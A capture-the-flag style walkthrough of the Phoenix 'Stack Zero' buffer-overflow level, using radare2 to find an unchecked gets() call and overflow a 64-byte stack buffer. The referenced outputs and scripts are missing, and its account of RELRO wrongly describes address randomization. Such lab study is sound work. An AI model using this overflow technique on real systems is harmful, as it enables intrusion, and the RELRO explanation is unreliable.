Phoenix is a virtual machine that can be obtained from exploit.education. It provides an educational environment so that one can practice on their skills. For additional details, visit the website.
In case of reluctancy due to the risk of downloading an unknown virtual machine, Debian packages are also provided.
Stack Zero, which is the first level, introduces the legendary stack-based buffer overflow.
In order to get a glimpse of what the binary is all about, rabin2 comes to the rescue:
What can be gathered from the above info are the following:
The binary is a 32-bit Linux ELF (arch x86, bintype elf, bits 32, class ELF32, os linux..).
The endianness is little (endian little).
It wasn't compiled with the Stack Smashing Protector (SSP) compiler feature (canary false), thus allowing stack-based buffer overflow.
It wasn't compiled with the Data Execution Prevention (DEP) or No-Execute (NX) compiler feature (nx false), which cannot prevent shellcode execution.
It wasn't compiled with the RELocation Read-Only compiler feature (relro no), which means that the binary and all of its dependencies are not loaded into randomized locations within virtual memory each time it is executed. This feature hinders Return Oriented Programming a lot.
Considering the above information, if the binary accepts input via environment variables, arguments or STDIN, it can be exploited.
To disassemble the binary, r2 can be used.
It is not recommended to use aaa or -A as an argument when opening a binary, because it could take a really long time if that binary is big. Using radare2, one needs to know what analysis is more beneficial at every stage of reverse engineering a binary. In this particular case, aas, which uses binary header information to find public functions, is good enough.
There are a couple options available to view the disassembly at a particular address. One that can be used is s to seek to that address and then use pdf to disassemble the current function, or VV to use the Visual Graph.
Another cool command is agf, which outputs the basic blocks function graph.
There are a few things that can be seen from the disassembled main function:
There are two local variables:
var_4ch, which is the buffer where the input from STDIN is saved at and it has a size of 0x4c-0xc=0x40 (64 bytes in decimal).
var_ch, which is a 32-bit integer.
There is a call to gets with var_4ch as an argument at 0x080484e4. gets does not restrict the size of bytes that are to be read and is, thus, vulnerable to stack-based buffer overflow.
The objective is to change the value of var_ch, which is tested at address 0x080484ef.
With that in mind, to exploit this the input must have a size of, at least, 65 bytes (64 is the size of the buffer and to overwrite the value of var_ch one more byte at minimum is needed).
Before opening the binary in debugger mode using radare2, a rarun2 profile is needed so that the input can be read from the binary. In order to do that, a file needs to be created with the following contents:
Replace /dev/pts/0 with the output of the command tty and ./pattern with the full path to the file that contains the input to be read from the binary.
One more thing that is essential is a file that contains the input. For that, python3 is going to be used.
Now, the binary can be debugged as follows:
Note that when debugging with radare2, the visual panels are really awesome! They can be accessed with v! or V!.
To showcase that the binary is indeed vulnerable, a breakpoint before the call to gets is necessary. That can be done by simply executing db followed by the address and then dc to continue until the breakpoint is hit.
Before calling gets, it is a good idea to check the value of var_ch. This can be accomplished by first checking the value of the ebp register, via dr, and then viewing the hexdump at address ebp-0xc, via px/xw.
To execute the next instruction by stepping over, simply use dso.
As shown above, the value of var_ch is indeed overwritten.
Conclusion
The binary was not compiled with the necessary features that would otherwise prevent stack-based buffer overflows and contains a call to gets, which does not account the size of bytes to be read from STDIN. As such, one needs to account the size of the buffer and simply input more bytes than it can actually hold so that the stack overflows.